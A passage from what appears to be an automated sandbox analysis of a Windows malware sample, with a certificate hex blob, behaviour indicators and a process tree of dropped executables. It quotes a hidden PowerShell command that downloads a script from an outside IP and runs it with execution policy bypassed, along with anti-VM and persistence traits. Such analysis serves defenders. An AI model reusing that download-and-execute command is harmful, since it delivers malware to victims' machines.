040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a mAtJWNv.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
pid Process 2160 d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe 2668 rapes.exe 2616 powershell.exe 2616 powershell.exe 2616 powershell.exe 1504 powershell.exe 1488 ktxzLhN.exe 1488 ktxzLhN.exe 2300 dll32.exe 2300 dll32.exe 2300 dll32.exe 940 zY9sqWs.exe 940 zY9sqWs.exe 940 zY9sqWs.exe 940 zY9sqWs.exe 1040 v6Oqdnc.exe 2324 ce4pMzk.exe 2324 ce4pMzk.exe 2324 ce4pMzk.exe 2324 ce4pMzk.exe 2780 powershell.exe 1640 FvbuInU.exe 1640 FvbuInU.exe 1640 FvbuInU.exe 1640 FvbuInU.exe 1640 FvbuInU.exe 2800 ktxzLhN.exe 2800 ktxzLhN.exe 2880 dll32.exe 2844 vertualiziren.exe 2736 460d9c14c9.exe 1972 69c80032ec.exe 3640 8e275fbb94.exe 3640 8e275fbb94.exe 3640 8e275fbb94.exe 3640 8e275fbb94.exe 3632 41108e652a.exe 3632 41108e652a.exe 3632 41108e652a.exe 3240 cnntXtU.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2616 powershell.exe Token: SeDebugPrivilege 1504 powershell.exe Token: SeDebugPrivilege 1488 ktxzLhN.exe Token: SeDebugPrivilege 2300 dll32.exe Token: SeDebugPrivilege 2324 ce4pMzk.exe Token: SeDebugPrivilege 1700 tasklist.exe Token: SeDebugPrivilege 3052 tasklist.exe Token: SeDebugPrivilege 920 tasklist.exe Token: SeDebugPrivilege 908 tasklist.exe Token: SeDebugPrivilege 2080 tasklist.exe Token: SeDebugPrivilege 1044 tasklist.exe Token: SeDebugPrivilege 2796 tasklist.exe Token: SeDebugPrivilege 2780 powershell.exe Token: SeDebugPrivilege 2840 tasklist.exe Token: SeDebugPrivilege 3028 tasklist.exe Token: SeDebugPrivilege 1288 tasklist.exe Token: SeDebugPrivilege 2380 tasklist.exe Token: SeDebugPrivilege 1848 tasklist.exe Token: SeDebugPrivilege 2760 tasklist.exe Token: SeDebugPrivilege 2568 tasklist.exe Token: SeDebugPrivilege 2140 tasklist.exe Token: SeDebugPrivilege 2616 tasklist.exe Token: SeDebugPrivilege 2136 tasklist.exe Token: SeDebugPrivilege 1144 tasklist.exe Token: SeDebugPrivilege 1296 tasklist.exe Token: SeDebugPrivilege 2940 tasklist.exe Token: SeDebugPrivilege 2284 tasklist.exe Token: SeDebugPrivilege 2400 tasklist.exe Token: SeDebugPrivilege 2920 tasklist.exe Token: SeDebugPrivilege 1736 tasklist.exe Token: SeDebugPrivilege 2700 tasklist.exe Token: SeDebugPrivilege 2864 tasklist.exe Token: SeDebugPrivilege 2800 ktxzLhN.exe Token: SeDebugPrivilege 2836 tasklist.exe Token: SeDebugPrivilege 2880 dll32.exe Token: SeDebugPrivilege 1748 tasklist.exe Token: SeDebugPrivilege 2856 tasklist.exe Token: SeDebugPrivilege 2924 tasklist.exe Token: SeDebugPrivilege 1296 tasklist.exe Token: SeDebugPrivilege 1316 tasklist.exe Token: SeDebugPrivilege 2436 tasklist.exe Token: SeDebugPrivilege 3016 tasklist.exe Token: SeDebugPrivilege 556 tasklist.exe Token: SeDebugPrivilege 2728 tasklist.exe Token: SeDebugPrivilege 304 tasklist.exe Token: SeDebugPrivilege 2144 tasklist.exe Token: SeDebugPrivilege 1480 tasklist.exe Token: SeDebugPrivilege 748 tasklist.exe Token: SeDebugPrivilege 1300 tasklist.exe Token: SeDebugPrivilege 1236 tasklist.exe Token: SeDebugPrivilege 940 tasklist.exe Token: SeDebugPrivilege 1056 tasklist.exe Token: SeDebugPrivilege 916 tasklist.exe Token: SeDebugPrivilege 2344 tasklist.exe Token: SeDebugPrivilege 2924 tasklist.exe Token: SeDebugPrivilege 2104 tasklist.exe Token: SeDebugPrivilege 296 tasklist.exe Token: SeDebugPrivilege 1544 tasklist.exe Token: SeDebugPrivilege 2968 tasklist.exe Token: SeDebugPrivilege 396 taskkill.exe Token: SeDebugPrivilege 1236 tasklist.exe Token: SeDebugPrivilege 2400 tasklist.exe Token: SeDebugPrivilege 772 taskkill.exe Token: SeDebugPrivilege 908 taskkill.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
pid Process 2160 d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe 2964 nhDLtPT.exe 300 firefox.exe 300 firefox.exe 300 firefox.exe 300 firefox.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 300 firefox.exe 300 firefox.exe 300 firefox.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3240 cnntXtU.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2160 wrote to memory of 2668 2160 d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe 30 PID 2160 wrote to memory of 2668 2160 d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe 30 PID 2160 wrote to memory of 2668 2160 d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe 30 PID 2160 wrote to memory of 2668 2160 d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe 30 PID 2668 wrote to memory of 1728 2668 rapes.exe 32 PID 2668 wrote to memory of 1728 2668 rapes.exe 32 PID 2668 wrote to memory of 1728 2668 rapes.exe 32 PID 2668 wrote to memory of 1728 2668 rapes.exe 32 PID 1728 wrote to memory of 2876 1728 PcAIvJ0.exe 33 PID 1728 wrote to memory of 2876 1728 PcAIvJ0.exe 33 PID 1728 wrote to memory of 2876 1728 PcAIvJ0.exe 33 PID 2876 wrote to memory of 2616 2876 cmd.exe 35 PID 2876 wrote to memory of 2616 2876 cmd.exe 35 PID 2876 wrote to memory of 2616 2876 cmd.exe 35 PID 2616 wrote to memory of 1504 2616 powershell.exe 36 PID 2616 wrote to memory of 1504 2616 powershell.exe 36 PID 2616 wrote to memory of 1504 2616 powershell.exe 36 PID 2668 wrote to memory of 1488 2668 rapes.exe 38 PID 2668 wrote to memory of 1488 2668 rapes.exe 38 PID 2668 wrote to memory of 1488 2668 rapes.exe 38 PID 2668 wrote to memory of 1488 2668 rapes.exe 38 PID 1488 wrote to memory of 2300 1488 ktxzLhN.exe 39 PID 1488 wrote to memory of 2300 1488 ktxzLhN.exe 39 PID 1488 wrote to memory of 2300 1488 ktxzLhN.exe 39 PID 2668 wrote to memory of 940 2668 rapes.exe 40 PID 2668 wrote to memory of 940 2668 rapes.exe 40 PID 2668 wrote to memory of 940 2668 rapes.exe 40 PID 2668 wrote to memory of 940 2668 rapes.exe 40 PID 2668 wrote to memory of 2032 2668 rapes.exe 41 PID 2668 wrote to memory of 2032 2668 rapes.exe 41 PID 2668 wrote to memory of 2032 2668 rapes.exe 41 PID 2668 wrote to memory of 2032 2668 rapes.exe 41 PID 2668 wrote to memory of 1040 2668 rapes.exe 44 PID 2668 wrote to memory of 1040 2668 rapes.exe 44 PID 2668 wrote to memory of 1040 2668 rapes.exe 44 PID 2668 wrote to memory of 1040 2668 rapes.exe 44 PID 1040 wrote to memory of 2092 1040 v6Oqdnc.exe 45 PID 1040 wrote to memory of 2092 1040 v6Oqdnc.exe 45 PID 1040 wrote to memory of 2092 1040 v6Oqdnc.exe 45 PID 1040 wrote to memory of 2092 1040 v6Oqdnc.exe 45 PID 2668 wrote to memory of 2752 2668 rapes.exe 46 PID 2668 wrote to memory of 2752 2668 rapes.exe 46 PID 2668 wrote to memory of 2752 2668 rapes.exe 46 PID 2668 wrote to memory of 2752 2668 rapes.exe 46 PID 2752 wrote to memory of 2576 2752 MCxU5Fj.exe 47 PID 2752 wrote to memory of 2576 2752 MCxU5Fj.exe 47 PID 2752 wrote to memory of 2576 2752 MCxU5Fj.exe 47 PID 2752 wrote to memory of 2576 2752 MCxU5Fj.exe 47 PID 2752 wrote to memory of 2608 2752 MCxU5Fj.exe 48 PID 2752 wrote to memory of 2608 2752 MCxU5Fj.exe 48 PID 2752 wrote to memory of 2608 2752 MCxU5Fj.exe 48 PID 2752 wrote to memory of 2608 2752 MCxU5Fj.exe 48 PID 2752 wrote to memory of 2608 2752 MCxU5Fj.exe 48 PID 2752 wrote to memory of 2608 2752 MCxU5Fj.exe 48 PID 2752 wrote to memory of 2608 2752 MCxU5Fj.exe 48 PID 2752 wrote to memory of 2608 2752 MCxU5Fj.exe 48 PID 2752 wrote to memory of 2608 2752 MCxU5Fj.exe 48 PID 2752 wrote to memory of 2608 2752 MCxU5Fj.exe 48 PID 2752 wrote to memory of 2868 2752 MCxU5Fj.exe 49 PID 2752 wrote to memory of 2868 2752 MCxU5Fj.exe 49 PID 2752 wrote to memory of 2868 2752 MCxU5Fj.exe 49 PID 2752 wrote to memory of 2868 2752 MCxU5Fj.exe 49 PID 2608 wrote to memory of 1460 2608 MCxU5Fj.exe 50 PID 2608 wrote to memory of 1460 2608 MCxU5Fj.exe 50 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe"C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2EED.tmp\2EEE.tmp\2EEF.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2616 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1504
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe"C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1488 -
C:\Users\Admin\AppData\Local\Temp\dll32.exe"C:\Users\Admin\AppData\Local\Temp\dll32.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2300 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp2961.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp2961.tmp.bat5⤵PID:1672
-
C:\Windows\system32\chcp.comchcp 650016⤵PID:2472
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:1968
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:1256
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3052
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:1764
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:2636
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Suspicious use of AdjustPrivilegeToken
PID:920
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:2504
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:296
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:908
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:1732
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:2828
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2080
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:2664
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:2872
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1044
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:876
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:1676
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
PID:2004
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:1556
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:1268
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2796
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:2580
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:2768
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2840
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:1920
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:592
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3028
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:2256
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:880
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1288
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:848
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:2200
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2380
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:624
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵PID:2896
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1848
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:944
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:1980
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2760
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:1040
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:2560
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2568
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:2836
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:2440
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2140
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:2840
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵PID:2180
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2616
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:2916
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:2176
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2136
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:2144
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵PID:2860
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1144
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:484
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵PID:2124
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1296
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:3028
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:2456
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2940
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:1532
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:2248
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2284
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:1600
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵PID:3064
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2400
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:2520
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:2016
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2920
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:916
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:296
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1736
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:2476
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:2828
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:2792
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:1700
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2864
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:2664
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:1572
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2836
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:2716
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵PID:2684
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1748
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:332
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:1908
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2856
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:2188
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:2460
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2924
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:1144
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:2152
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1296
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:3028
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:1288
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1316
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:2172
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:2996
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2436
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:828
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:2292
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3016
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:1044
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵PID:1584
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Suspicious use of AdjustPrivilegeToken
PID:556
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:2892
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:2360
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2728
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:2664
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:2560
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:304
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:2684
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:300
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2144
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:3060
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:840
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1480
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:2320
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵PID:2964
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:748
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:2064
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:1536
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1300
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:1656
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:1048
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2300"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1236
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:2000
-
-
